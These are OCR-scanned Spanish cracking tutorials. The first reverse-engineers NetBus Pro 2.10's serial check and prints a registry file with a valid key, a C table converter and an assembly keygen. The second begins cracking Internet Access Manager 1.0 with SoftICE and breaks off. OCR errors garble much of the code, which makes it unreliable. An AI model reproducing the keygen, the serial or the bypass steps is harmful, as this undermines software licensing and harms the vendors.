:004D5A8A 80F932 cmp cl, 32 

:004D5A8D 7202 jb 004D5A91 <--- Comprueba que sea menor que 32h 
:004D5A8F B132 mov cl, 32 <--- CL = 32h 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5A8D(C) 


| 

:004D5A91 880F mov byte ptr [edi], cl 

:004D5A93 46 inc esi 

:004D5A94 47 inc edi 

:004D5A95 F3 repz 

:004D5A96 A4 movsb <--- Desplaza a EDI el nombre (si es mayor de 32h, lo recorta) 
:004D5A97 8BD8 mov ebx, eax 

:004D5A99 33D2 xor edx, edx 

:004D5A9B 8A54240A mov dl, byte ptr [esp+0A] <--- DL = Longitud del nombre 
:004D5A9F 42 inc edx 

:004D5AAO 83FA32 cmp edx, 00000032 

:004D5AA3 7FOE jg 004D5AB3 <--- Comprueba si el nombre es menor a 32h 
:004D5AA5 8D44140A lea eax, dword ptr [esp+edx+0A] <--- EAX = Apunta al final de la cadena 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5AB1(C) 


:004D5AA9 C6002A mov byte ptr [eax], 2A <--- En este bucle, rellena de * el final del nombre hasta 33h 
:004D5AAC 42 inc edx 


:004D5AAD 40 inc eax 
:004D5AAE 83FA33 cmp edx, 00000033 


:004D5AB1 75F6 ¡ne OO04D5AA9 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5AA3(C) 


:004D5AB3 8BCC mov ecx, esp <--- ECX = Long Serial + $ + Nuestro Serial + Long Name + Nuestro Nombre + ****(hasta 
33h) 

:004D5AB5 8D54240A lea edx, dword ptr [esp+0A] <--- EDX = Apunta al nombre 

:004D5AB9 8BC3 mov eax, ebx 


Despues de analizar el codigo, al pasar la direccion 4D5ABB y poniendo d edx, podemos observar que tenemos un numero 
que nosotros no habiamos introducido y ke ha aparecido de "la nada". Asi que, hmm, habra que entrar en esta llamada a ver 
que nos "cuenta". He de comentar que las operaciones que realiza entre las direcciones 4D59BC hasta 4D59ED es lo mismo 
que hemos visto antes: junta nuestro serial con el nombre y blabla blablabla (me he expresado con claridad?? xDD). Veamos 
que hay despues de eso: 


:004D59EF 8BFO mov esi, eax 

:004D59F1 33DB xor ebx, ebx 

:004D59F3 889E75030000 mov byte ptr [esi+00000375], bl 

:004D59F9 8D442440 lea eax, dword ptr [esp+40] 

:004D59FD 50 push eax 

:004D59FE 8BCB mov ecx, ebx 

:004D5A00 8D54240E lea edx, dword ptr [esp+0E] <--- EDX = Long Name + Nuestro Nombre 
:004D5A04 8BC6 mov eax, esi 


:004D5A0B 8D442440 lea eax, dword ptr [esp+40] <--- EAX = Long Serial + $ + 12 Serial valido 
:004D5AOF 8BD4 mov edx, esp 

:004D5A11 33C9 xor ecx, ecx 

:004D5A13 8A08 mov cl, byte ptr [eax] 

:004D5A15 41 inc ecx 

:004D5A16 E811D2F2FF call 00402C2C 

:004D5A1B 0OF94CO0 sete al 

:004D5A1E 84C0 test al, al 

:004D5A20 7538 ¡ne 004D5A5A 

:004D5A22 B301 mov bl, 01 

:004D5A24 889E75030000 mov byte ptr [esi+-000003751, bl 

:004D5A2A 8D442440 lea eax, dword ptr [esp+40] 

:004D5A2E 50 push eax 

:004D5A2F 8BCB mov ecx, ebx 

:004D5A31 8D54240E lea edx, dword ptr [esp+0E] <--- EDX = Long Name + Nuestro Nombre 
:004D5A35 8BC6 mov eax, esi 


:004D5A3C 8D442440 lea eax, dword ptr [esp+40] <--- EAX = Long Serial + $ + 22 Serial valido 


Bien, como podeis comprobar hay dos llamadas diferentes para generas nuestros serials: 12 serial en la direccion 4D5A06 y el 
22 serial en 4D5A37. Para poder ver esos serials, debeis pasar la llamada y poner d eax (en ambos casos). Para comprobar si 
esos serials son los correcots, tendremos que salir de SICE, no sin antes quitar todos los bpx con bc *, ejecutar el netbus.exe 
y probar los serials con el nombre correspondiente. No hace falta que os diga, que esos serials son los correctos, no? ;-) 


He de mencionar que no tengo ni la mas remota idea de porque el programador se ha molestado en realizar todas esas 
operaciones con el nuestro serial (1234567890) y el nombre, ya que, como vereis mas adelante, no lo usa para nada. 


Me gustaria añadir otra cosa mas. Una vez obtenidos los serials, por si recordais en el "primer objetivo” vimos que el 
programa comprueba en el registro si los datos son correctos. Por ello, tenemos otra posibilidad en vez de crack: podemos 
crear un archivo que nos introduzca en el registro de windows nuestros datos con uno de los dos serials correctos obtenidos 
anteriormente para tener registrado "oficialmente y sin trampas el programa" xDDD . El programa que yo edite es tal que asi: 


REGEDIT4 


[HKEY_CURRENT_USERNetBua License] 
"Company" = "Hispano Crackers" 

"Key" = "66D6654A" 

"Name" = "Mr. Burns" 


De esta manera teneis una forma mas elegante de registrarlo con vuestros datos. Tras esto.. creo que deberiamos ir a por 


--- Objetivo FiNaL: KeYgEn --- 


Al igual que antes, ahora tenemos una ventaja: sabemos las direcciones donde se generan los dos serials posibles. Esto nos 
rebajara muchisimo el trabajo, aunque tenemos mucho por hacer. Empezaremos entrando en la CALL de la direccion 4D5ABB 
que es donde se generan los dos serials (no voy a especificar mas, para eso ya he implementado el codigo de las operaciones 
que se realizan). Dentro de esa llamada tenemos las otras dos llamadas que mas nos interesan: 4D5A06 y 4D5A37. De 
momento nos vamos a centrar en la primera, y una vez comprendido el codigo, pasaremos a la segunda (aunque la 
diferencia es minima). Ahora entremos en la primera llamada y vemos que tiene en sus entrañas: 


* Referenced by a CALL at Addresses: 
|:004D5A06 , :004D5A37 <--- Podemos darnos cuenta que este codigo genera dos dos serials, no? 


:004D5810 55 push ebp <--- Desde aqui hasta la direccion 4D5832, lo que hace es mover Long Name + Nuestro Nombre a 
"otro lugar" 


:004D5811 8BEC mov ebp, esp 

:004D5813 81C46CFFFFFF add esp, FFFFFF6C 
:004D5819 53 push ebx 

:004D581A 56 push esi 

:004D5818B 57 push edi 

:004D581C 8BF2 mov esi, edx 

:004D581E 8D7DC2 lea edi, dword ptr [ebp-3E] 
:004D5821 51 push ecx 

:004D5822 33C9 xor ecx, ecx 

:004D5824 8A0E mov cl, byte ptr [esi] 
:004D5826 80F932 cmp cl, 32 

:004D5829 7202 jb 004D582D 

:004D582B B132 mov cl, 32 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5829(C) 


| 

:004D582D 880F mov byte ptr [edi], cl 
:004D582F 46 inc esi 

:004D5830 47 inc edi 

:004D5831 F3 repz 

:004D5832 A4 movsb 

:004D5833 59 pop ecx 

:004D5834 884DFF mov byte ptr [ebp-01], cl 
:004D5837 8BD8 mov ebx, eax 

:004D5839 33C0 xor eax, eax 

:004D583B 8A45C2 mov al, byte ptr [ebp-3E] 
:004D583E 40 inc eax 

:004D583F 83F832 cmp eax, 00000032 
:004D5842 7FOE jg 004D5852 

:004D5844 8D5405C2 lea edx, dword ptr [ebp+eax-3E] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5850(C) 


:004D5848 C6022A mov byte ptr [edx], 2A <--- En este bucle rellena hasta 33h de " * " 
:004D584B 40 inc eax 


:004D584C 42 inc edx 


:004D584D 83F833 cmp eax, 00000033 
:004D5850 75F6 jne 004D5848 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D5842(C) 


| 

:004D5852 8D8D6CFFFFFF lea ecx, dword ptr [ebp+FFFFFF6C] 

:004D5858 8B9324020000 mov edx, dword ptr [ebx+-00000224] 

:004D585E 8BC3 mov eax, ebx 

:004D5860 E853FEFFFF call 004D56B8 <--- Genera un numero esencial para el keygen (116ADFA4) que lo llamaremos Num1 
:004D5865 8D956CFFFFFF lea edx, dword ptr [ebp+FFFFFF6C] <--- EDX = Ese mismo numero 
:004D586B 8D45F5 lea eax, dword ptr [ebp-0B] 

:004D586E B109 mov cl, 09 

:004D5870 ES03D3F2FF call 00402B78 <--- Desplaza Numl 

:004D5875 B80A000000 mov eax, OOO0000A 

:004D587A 8D55F5 lea edx, dword ptr [ebp-0B] 

:004D587D 8DB57BFFFFFF lea esi, dword ptr [ebp+FFFFFF7B] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D588A(C) 


:004D5883 8A0A mov cl, byte ptr [edx] <--- En este bucle se mueve Long Name + Nuestro Nombre (con los *) 


:004D5885 880E mov byte ptr [esi], cl <--- De esta manera tenemos Long Numl + $ + Num1l + Long Name + Nuestro 
Nombre 


:004D5887 46 inc esi 

:004D5888 42 inc edx 

:004D5889 48 dec eax 

:004D588A 75F7 jne 004D5883 

:004D588C B833000000 mov eax, 00000033 
:004D5891 8D55C2 lea edx, dword ptr [ebp-3E] 
:004D5894 8D7585 lea esi, dword ptr [ebp-7B] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D589E(C) 


:004D5897 8A0A mov cl, byte ptr [edx] 

:004D5899 880E mov byte ptr [esil, cl 

:004D589B 46 inc esi 

:004D589C 42 inc edx 

:004D589D 48 dec eax 

:004D589E 75F7 ¡ne 004D5897 

:004D58A0 8D8D6CFFFFFF lea ecx, dword ptr [ebp+FFFFFF6C] 

:004D58A6 8B9328020000 mov edx, dword ptr [ebx+00000228] 

:004D58AC 8BC3 mov eax, ebx 

:004D58AE ESO5FEFFFF call 004D56B8 <--- Genera otro numero esencial (201AF3D7) que llamaremos Num2 
:004D58B3 8D956CFFFFFF lea edx, dword ptr [ebp+FFFFFF6C] 

:004D58B9 8D45F5 lea eax, dword ptr [ebp-0B] 

:004D58BC B109 mov cl, 09 

:004D58BE E8B5D2F2FF call 00402B78 <--- Desplaza Num2 y comprueba si hemos de modificar Num2 
:004D58C3 807DFFOO cmp byte ptr [ebp-01], 00 

:004D58C7 7417 je 004D58E0 <--- Si hemos de modificar Num2, no saltamos 

:004D58C9 B80A000000 mov eax, 0000000A 

:004D58CE 8D55F5 lea edx, dword ptr [ebp-0B] 

:004D58D1 8D75B8 lea esi, dword ptr [ebp-48] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58DC(C) 


:004D58D4 8A0A mov cl, byte ptr [edx] <--- Este bucle tan solo decrementa cada uno de los elementos de Num2 con el que 
se genera el segundo serial valido 

:004D58D6 49 dec ecx 

:004D58D7 880E mov byte ptr [esil, cl 

:004D58D09 46 inc esi 

:004D58DA 42 inc edx 

:004D58DB 48 dec eax 


:004D58DC 75F6 jne 004D58D4 <--- Despues de bucle tenemos +41/00E2C6 que llamaremos Num3 
:004D58DE EB14 jmp 004D58F4 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58C7(C) 


| 

:004D58E0 B80A000000 mov eax, 0000000A 
:004D58E5 8D55F5 lea edx, dword ptr [ebp-0B] 
:004D58E8 8D75B8 lea esi, dword ptr [ebp-48] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58F2(C) 


:004D58EB 8A0A mov cl, byte ptr [edx] <--- Este bucle desplaza Num2 o Num3, segun sea el caso 
:004D58ED 880E mov byte ptr [esil, cl 

:004D58EF 46 inc esi 

:004D58F0 42 inc edx 

:004D58F1 48 dec eax 

:004D58F2 75F7 ¡ne 004D58EB 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004D58DE(U) 
| 


:004D58F4 8B9334030000 mov edx, dword ptr [ebx+00000334] 

:004D58FA 8D8D7BFFFFFF lea ecx, dword ptr [ebp+FFFFFF7B] <--- Temenos: Long Numl + $ + Numl + Long Name + 
Nombre + Long Num2 + $ + Num2 + Long Name + Nombre 

:004D5900 8BC3 mov eax, ebx 

:004D5902 ES69FDFFFF call 004D5670 <--- Realiza las operaciones que generan nuestros serials!!! 
:004D5907 8BDO mov edx, eax 

:004D5909 8D8D6CFFFFFF lea ecx, dword ptr [ebp+FFFFFF6C] 

:004D590F 8BC3 mov eax, ebx 

:004D5911 E8A2FDFFFF call 004D56B8 

:004D5916 8D956CFFFFFF lea edx, dword ptr [ebp+FFFFFF6C] <--- EDX = Serial Correcto!!!! 
:004D591C 8B4508 mov eax, dword ptr [ebp+08] 

:004D591F B109 mov cl, 09 

:004D5921 E852D2F2FF call 00402B78 

:004D5926 5F pop edi 

:004D5927 5E pop esi 

:004D5928 5B pop ebx 

:004D5929 8BE5 mov esp, ebp 

:004D592B 5D pop ebp 

:004D592C C20400 ret 0004 


Antes de nada comentar que todo este "churro" de instrucciones generan los dos serials, la unica diferencia se encuentra 
(como he comentado en el codigo) en la llamada 4D58BE y en el bucle 4D58D4 - 4D58DC. No quiero comentar las llamadas 
que generan Num1, Num2 y Num3 porque tan solo son constantes y este tutorial tiene un tamaño excesivo, pero si quereis 
os lo dejo como ejercicio xDDD. Bien tan solo nos queda entrar en la llamada de la direccion 4D5902 y ver que operaciones 
realiza con ese cadena tan larga que teniamos con Numl, Num2 el nombre y demas. Pero antes quiero hacer un simple 
resumen de lo que hemos visto aqui para los que se han perdido; todo el codigo de antes lo unico que hace es: 


- Genera la constante Num1 (Long Numl1 + $ + 116ADFA4) en la direccion 4D5860 


- Junta Numl y el Nombre obteniendo (Cadena1): Long Numl1 + $ + Num1 + Long Name + Nombre (relleno 
de " * " hasta 33h) 


- Genera la constante Num2 (Long Numl1 + $ + 201AF3D7) en la direccion 4D58AE 


- Comprueba si ya ha realizado el serial con ese numero, si es asi, modifica Num2 para darnos Num3 


decrementando cada uno de sus elementos ( Long Num3 + $ + ++1/00E2C6) en la direccion 4D58BE hasta 
A4D58DC. 


- Junta Cadenal con Long Num2 (o Num3) + $ + Num2 (o 3) + Long Name + Nombre (relleno de " * *) 


Espero que con esto os hayais aclarado. Ahora vamosa entrar en la llamada de la direccion 4D5902 a ver que hace con esa 
cadena: 


* Referenced by a CALL at Addresses: 
|:004D5902 , :004D5967 , :004D59AC 


| 

:004D5670 53 push ebx 

:004D5671 56 push esi 

:004D5672 57 push edi 

:004D5673 83C4B8 add esp, FFFFFFB8 

:004D5676 8BF1 mov esi, ecx 

:004D5678 8D3C24 lea edi, dword ptr [esp] 

:004D567B B911000000 mov ecx, 00000011 

:004D5680 F3 repz 

:004D5681 A5 movsd 

:004D5682 66A5 movsw 

:004D5684 A4 movsb <--- Hasta aqui, lo unico que ha hecho es mover Long Numl + $ + Num1 + Long Name + Nombre + 
Long Num2 (o 3) + $ + Num (0 3) 

:004D5685 B147 mov cl, 47 <--- CL = 47h = Longitud de la cadena que acaba de desplazar 
:004D5687 8BC4 mov eax, esp <--- EAX apunta al principio de esa cadena 


* Referenced by a (U)nconditional or (C)onditional J ump at Address: <--- Comenzamos el bucle final 
|: 004D56AD(C) 


| 

:004D5689 8BDA mov ebx, edx <--- Al principio EBX = OOABCDEFh 

:004D568B C1EBO8 shr ebx, 08 <--- EBX = cuatro primeros 

:004D568E 81E3FFFFFFOO and ebx, OOFFFFFF <--- Lo "filtra" 

:004D5694 0FB630 movzx esi, byte ptr [eax] <--- ESI = Elemento de la cadena 

:004D5697 33D6 xor edx, esi <--- EDX xor ESI 

:004D5699 81E2FF000000 and edx, OOOOOOFF <--- EDX = Los dos ultimos elementos 

:004D569F 8B14958C414F00 mov edx, dword ptr [4*edx+004F418C] <--- Lo mas importante, lo comentamos ahora... 
:004D56A6 33DA xor ebx, edx <--- EBX xor EDX 

:004D56A8 8BD3 mov edx, ebx <--- EDX = EBX 

:004D56AA 40 inc eax <--- EAX apunta al siguiente elemento de la cadena 

:004D56AB FEC9 dec cl <--- CL = CL - 1 

:004D56AD 75DA ¡ne 004D5689 <--- No para hasta realizar las operaciones con todos los elementos de la cadena 
:004D56AF 8BC2 mov eax, edx <--- EAX = Serial correcto 

:004D56B1 830448 add esp, 00000048 

:004D56B4 5F pop edi 

:004D56B5 5E pop esi 

:004D56B6 5B pop ebx 

:004D56B7 C3 ret 


Las operaciones que tenemos aqui no tienen especial complicacion, lo unico que quiero es destacar la direccion 4D569F; ahi 
lo que hace es recoger una palabra en la posicion que indique EDX * 4 de una tabla que debemos recoger. Hemos de tener 
en cuenta dos cosas: 12 Al tener anteriormente una and edx, OFFh hemos de tener en cuenta que EDX no sera mayor de FFh 
asi que su rango sera de OO0h a FFh; y 22 tenemos de multiplicar ese valor por 4. Asi que para poder determinar el principio 
de la tabla seria 00 * 4 + 4F418C = 4F418C y el final sera FF * 4 + 4F418C = 4F458C, es decir, que la tabla tiene un tamaño 
de 400h = 1024d bytes. Esta tabla no os la pongo porque, no me da la gana xDD Para ello yo use el |ceDump: /dump 
4F418C 400 C:INetbus210_Tabla.txt, con este comando tendreis la tabla que necesitais para crear el keygen, pero he de 
avisar que hay un fallo (aunque no se si os pasara a todos), el IceDump sustituye los "00h" por "20h", esto me volvio loco 
hasta que lo descubri, asi que estais avisados. 


Despues de todo esto ya tenemos la informacion necesaria para crear el keygen, el cual va a ser en ASM como es tradional 
xDD, Como la tabla tan solo eran numeros y debia añadirles, para que "funcionaran" en asm, una serie de elementos decidi 
hacer un programa simple en C, para evitar tener que añadir "h, " a 1024 elementos!!! y que me transformara 2000AFE1 
(que obtuve con el |ceDump) en db 020h, O00h, OAFh, OE1h (lo que entiende Tasm). Aqui os pongo el codigo: 


/FReconstructor v0.1 CoDeD bY Mr. Burns*/ 


/*CReaTeD WiTH TuRBo C*/ 


Ftinclude <stdio.h> 


void main() 


1 

FILE *Fileln, *FileOut; 

char Namel n[12], NameQut[ 12]; 
char Insert[] = "h,"; 

short Num; 

int Counter = 0, Cols; 


printf("Reconstructor v1.0 CoDeD bY Mr, Burns CoPYaLL 2001 01n"); 
printf("nFichero de entrada: "); 

fflush(stdin); 

gets(Namel n); 

printf("Fichero de salida: "); 

fflush(stdin); 

gets(NameQut); 


if((Fileln = fopen(Namel n, "r")) == NULL) 


printf('"|neRRoR - No se puede abrir %sin", Namel n); 
exit(1); 
J 


if((FileOut = fopen(NameQut, "w')) == NULL) 


1 

printf('"|neRRoR - No se puede abrir %sin", NameQut); 
exit(1); 

J 


while(!feof(Filel n)) 


1 

if((Counter % 10) == 0) 
fprintf(FileOut, 'ndb "); 
fread(SNum, 2, 1, Fileln); 
fprintf(FileOut, "0"); 
fwrite(SNum, 2, 1, FileOut); 
fwrite(|nsert, 3, 1, FileOut); 
Counter++; 


J 
printf('"ininoPeRaCioN FiNaLiZaDa CoN eXiTo1n"); 


fclose(Filel n); 
fclose(FileOut); 
J 


Despues de todo esto, aqui muestro el resultado de nuestro esfuerzo... un KeYgEn plagado de CaLLs por todos lados xDDDD 


NoTa: El keygen que vereis ahora no tiene la tabla necesaria (asi os lo currais un poquito ok?), tan solo la menciono. 


¡Netbus Pro v2.10 KeYgEn 
;CoDeR: Mr. Burns 
¡DaTe: 09-07-2001 


.MODEL TINY 
.CODE 
.386 


ORG 100h 


Start: jmp LetsRock 
¿AKI TENEMOS TODOS LOS DATOS... KE NO SON POCOS X-) 


Intro db 10, 13,'Netbus Pro v2.10 CoDeD bY Mr. Burns CoPYaLL 20010* 
db 10,13,'WeBSiTe: http://go.to/mr_burns' 
db 10,13,'e-MaiL: mr_burnsomyself.com' 
db 10,13 

db 10,13,'eNTeR YouR NaMe: $' 

Nombre0 db 32h,0 

Nombrel db 32h DUP(0) 

ScreenPass db 10,13,'YouR PaSSWORD is: ' 
PassOut1 db 08h DUP(0) 

db'oR' 

PassOut2 db 08h DUP(0) 

EndScreenPass db 10,13,'$' 

TempPass db 09h DUP(O) 

TempPassEnd db O 

Pass1 dd O 

Pass2 dd O 


MagicTable db 000h, O000h, O00h, O00h, O96h, 030h, 007h, 077h, 02Ch, O61h ;Tabla ke usaremos para generar el serial (tan 
solo teneis la 12 linea ;-)) 


MagicArray db 09h,24h, 31h, 31h, 36h, 41h,44h, 46h,41h, 34h 
db 00h,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah,2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah,2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah, 2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah, 2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah, 2Ah,2Ah, 2Ah 

db 2Ah 

dl 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h 


MagicNuml db 09h,24h,32h, 30h, 31h, 41h,46h, 33h,44h,37h 
MagicNum2 db 08h,23h,31h,2Fh, 30h,40h,45h, 32h,43h, 36h 


¡AKI TENEMOS EL CODIGO... PLAGADITO DE "CALLs", KE LAS ECHABA DE MENOS 


LetsRock: 

mov ah,09h ;Sacamos por pantalla la intro 
lea edx,|ntro ;y pedimos el nombre 

int 21h 


mov ah,0Ah ;Recogemos el nombre 
lea edx, NombreO 
int 21h 


mov ah,byte ptr [Nombre0+01] ; Comprobamos ke haya introducido 
cmp ah,00 ;algun nombre 
jne InsertName ;Si es asi, saltamos 


mov ah,4Ch ;Sino, salimos del programa 
int 21h 


InsertName: 

lea esi,Nombrel ;ESI = £Nombrel 

lea edi, MagicArray ¡EDI = SMagicArray 

Call |nsert_Name ;|nsertamos el nombre en MagicArray 


lea esi,MagicNuml ;ESI = €MagicNuml 
lea edi, MagicArray ¡EDI = SMagicArray 
call |nsert_MagicNum ;|ntertamos el MagicNum1 en MagicArray 


lea edi, MagicArray ¡EDI = MagicArray 
Call Create_Serial ;Generamos el primer serial 


mov [Pass1],edx ;Lo guardamos en Passl 


lea esi,MagicNum2 ;ESI = €MagicNum2 
lea edi, MagicArray ¡EDI = SMagicArray 
call |nsert_MagicNum ;|nsertamos el MAgicNum2 en MagicArray 


lea edi, MagicArray ¡EDI = SMagicArray 
Call Create_Serial ;Generamos el 28 serial posible 


mov [Pass2],edx ;Lo guardamos en Pass2 


lea di,PassOutl1 ¿DI = SPassOutl 
mov eax,[Pass1] ; EAX = 18 Serial posible 
Call Hex_Convert ;Lo convertimos a hexadecimal 


lea di, PassOut2 ¿DI = GPassOut2 
mov eax,[Pass2] ; EAX = 28 Serial posible 
Call Hex_Convert ;Lo convertimos en hexadecimal 


mov ah,09h ;Sacamos por pantalla los dos Serials 
lea edx, ScreenPass 
int 21h 


mov ah,4Ch ; Salimos sin ningun error 
int 21h 


Insert_Name PROC 


mov ah,byte ptr [Nombre0+1] ¡AH = Longitud del nombre 
mov byte ptr [edi+0Ah],ah ;Lo insertamos en MagicArray 
movzx ecx, ah ;ECX = AH 

xor ebx,ebx ;EBX = 0 

add edi,OBh ¿EDI = €(MagicArray+11) 


Next_Car: 

mov ah, byte ptr [esi+ebx] ¡AH = Caracter del nombre 
mov byte ptr [edi+ebx],ah ;Lo insertamos en MagicArray 
inc ebx ¡Pasamos al siguiente caracter 

cmp ebx,ecx ; Hemos llegado al final? 

jne Next_Car ¿NO => Al bucle de nuevo! 


ret ¡Salimos de la CaLL 
ENDP ¡Terminamos el proceso 
Insert_MagicNum PROC 


xor ebx,ebx ;EBX = 0 
add edi,3Dh ¡EDI = 8(MagicArray+3Dh) 


Next_Num: 

mov ah,byte ptr [esi+ebx] ¡AH = Digito del MagicNumX 
mov byte ptr [edi+ebx],ah ;Lo insertamos en MAgicArray 
inc ebx ¡Siguiente digito 

cmp ebx,OAh ;Hemos terminado? 

jne Next_Num ;NO => Al bucle de nuevo 


ret ;Salimos de la CaLL 


ENDP 


Create_Serial PROC 


xor ecx,ecx ;ECX =0 

xor esi,esi ¡ES = ECX = 0 xDDD 
mov cl,47h ¡CL = 47h 

mov edx, OABCDEFh ;¡EDX = ABCDEFh 


Calculate: 

mov ebx,edx ;EBX = EDX 

shr ebx,08h ;Recogemos los 4 primeros 

and ebx,OOFFFFFFh ;"Filtramos" 

movzx esi,byte ptr [edi] ;ESI = Caracter de MagicArray 
xor edx,esi ; EDX = EDX XoR ESI 

and edx,O00000FFh ;Nos kedamos con los dos ultimos 
mov eax,04h ¡EAX = 4 

mul edx ;EAX (Parte alta) = EDX * EAX 

mov edx,eax ;¡EDX = EAX 

lea eax, MagicTable ¡EAX = €MagicTable 

add eax,edx ;EAX = 6(MagicTable+EDX) 

mov esi,dword ptr [eax] ;ESI = Doble palabra ke este en esa posicion 
mov edx,esi ;EDX = ESI 

xor ebx,edx ;EBX = EBX XoR EDX 

mov edx,ebx ¡EDX = EBX 

inc edi ¡Siguiente caracter 

dec cl ;Decrementamos CL 

jnz Calculate ;CL = 0? 

¿NO => Al bucle de nuevo!!! 

ret ¡Salimos de la CaLL 


ENDP 


Hex_Convert PROC ; Proceso para convertir en 

¡hexadecimal (ASCI!) los resultados 

lea esi, TempPassEnd-1 ;Y ke, sinceramente, paso de comentar 
mov edx, 4 


Loopy: 

xor ebx, ebx 
mov bl, al 
movzx ebx, bl 
and bl,OFh 
add bl, 30h 
cmp bl,39h 
jle Ok1 

add bl, 7 
mov byte ptr [esi],bl 
dec esi 

jmp Part2 


Ok: 
mov byte ptr [esi], bl 
dec esi 


Part2: 

mov bl, al 
movzx ebx, bl 
shr bl, 4 

add bl, 30h 
cmp bl, 39h 
jle Ok2 

add bl, 7 
mov byte ptr [esi],bl 
dec esi 

jmp Part3 


Ok2: 


mov byte ptr [esi], bl 
dec esi 


Part3: 

shr eax,8 
dec edx 
jnz Loopy 


ConvertDone: 
inc esi 


CopyNumber: 
movsb 

cmp byte ptr [esi],O 
jne CopyNumber 


ret 
ENDP 


end Start 
Despues de todo esto... puff!! que agusto nos hemos quedado ehhh!!! "Pos" nada mas que decir... 


E AGRADECIMIENTOS Y DESPEDIDAS - 


Despues de todo el tiempo que he dedicado a este tutorial imagino que me haya equivocado en algo, y espero que vosotros 
me enseñeis algo a mi mandandome los errores que haya cometido. Espero volver a verles en el proximo tutorial. 


Por ultimo queria saludar a todos los miembros de mi la K-FoR y decirles que siempre les recordare y que he ganado grandes 
amigos ahi dentro. 


Como siempre digo en mis tutoriales, si deseais contactar conmigo buscadme en: 


NICK SeRViDOR CaNaL 
Mr_Burns 
irc.irc-hispano.org FCRaCKeRS 
“EKiMuS” 


O por el contrario si tan solo deseas mandarme un e-mail: mr_burnst»myself. com 


http://go.to/mr_burns/ http: //mr_burns.go.to/ http: //mrburns. da.ru/ 
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Profesor_X FECHA: 13/08/2001 


INTRODUCCION 


lo unico que buscamos es aprender mas sobre PROTECCIONES DE SOFTWARE , y asi tomar lo bueno y 
desechar lo malo y aplicarlo en nuestros propios programas para cuando nos toque estar en una empresa 
desarrolladora de software, podamos ofrecer un mejor producto, LO QUE SE MERECE EL CLIENTE "" 
CALIDAD Y EFICIENCIA """ en este mundillo del SHAREWARE, estas investigaciones para nosotros son solo 
profesionales, nunca con el afan de FREGAR a la compañia en cuestion, si no ponerle un punto de partida para que 
abran los ojos y digan HEY!!! QUE ESTOY HACIENDO MAL!!!! DEBO PONERME LAS PILAS Y HACER 


AL ATAKE 


| Comentario del Programa | 


Bueno chavales otro tuto mas en la lista .... ahora le toca el turno al programa llamado Internet 
Access Manager v 1.0 el cual desde este momento le llamaremos l aM, esta aplicación esta dirigida a 
algo en especial como lo es la cconfiguración de tus accesos telefonicos a internet o a otra 
computadora, asiendo el proceso lo mas facil posible para el usuario, tambien cuenta con un 
scheduler con el cual podras tener completo control de el tiempo de conexion que deseas, entre otra 
buenas opciones cuenta con una opcion de poder mostrar una estadistica con opcion de comparar 
dos estadisticas para tener una idea de cuanto tiempo y dinero estas gastando en tu conexion, 
tambien te mantiene en un estado pasivo la conexion cuando no etas usandola para prevenir una 
desconeccion por inactividad, a verdad es una buena utileria que merece estar dentro de tus 
aplicaciones de uso diario, pero porfavor comprenlo no sean gandallas...... lo que podemos decir 
sobre la proteccion es que es un poco burda ya que tratan de ponerla dificil, pero al final te das 
cuenta que es mucho mas facil de lo que imaginabas ya que dentro del programa ponen el serial 
correcto, y asi van comparando cada caracter que metes con el correcto, lo que se le llama 
hardcoded, ya veran por que lo digo. 


Manos a la Obra 


bueno amigos para empesar instalemos el laM y analizemoslo con la utileria File Inspector v 4.0 
para saber si esta empakada y en que lengueje esta hecho: 


(9 file msPEctor v4.2001 A El 


Signatura: 

<55 86 EC 83 C4 F4 53 69 EC 45 4A 00 ES A3 1C 
F6 FF 68 1D 7C 63 4A 00 68 94 4F 44 00 ES 17 
26 F6 FF 8B 15 30 63 44 00 89 02 68 9C 4F 44 > 


Versión de la DLL: — [2.1 L información... 


versión del SO: [t.o Versión de la imagen: [o.o 


Pulsa los rivales de > 
render GS abrrartivo... E Anales Gp sar 


como podemos ver esta hecho con Borland Delphi 3.0, mmm otra vez delphi.. jejjeje ....no esta 
empakado ni nada por el estilo.. ok continuemos ...ahora ejecutemos el programa para ver si acepta 
un serial y si al iniciar elprograma nos aparece una ventanita como esta : 


y Internet Access Manager 


Version 1.0 


April 9, 2001 
Author: Mas V. Vaslev 
Home: — Hitp://vwww softicidor com/igrew htrol 


[123456789 


mmm interesante .. jejejje ahora vamos y ponemos un numero de serie, que en mi caso pondre 
123467890 y damos click en el boton de OK y nos salta una ventanita como esta : 


19€) Sony, this registration code is invabd 


jejejeje mas de lo mismo, esto aprece una messagebox, lo primero seria desemsamblar el exe de el 
laM y buscar esa string, OK vayamos y desensamblemos, despues de un rato se termina de 
desemsamblar y vamos a buscar la string y cual es nuestra sorpresa que no hay nada de nada de 
SORRY, THE REGISTRATION BLA BLA BLA....se ve que estos programadores nos quieren hacer la 
vida de cuadritos, ok, 


Usando el Softl CE 


Encontrar un Serial Valido 


se acuerdan que la ventanita de error tiene un aspecto de messagebox, ok entonces vallamos y 
reiniciemos la PCERA con el Sice listo para funcionar, lo primero sera ejecutar el laM e ir a la 
ventana de insercion del serial y meter de nuevo algunos numeros, insertenlos y antes de dar ok , 
vamos y damos CONTROL D e insertamos un BPX MESSAGEBOXA, damos CONTROL D y regresamos 
a el laM ahora si damos click en el boton de OK! y saltamos directamente al SICE, damos una sola 
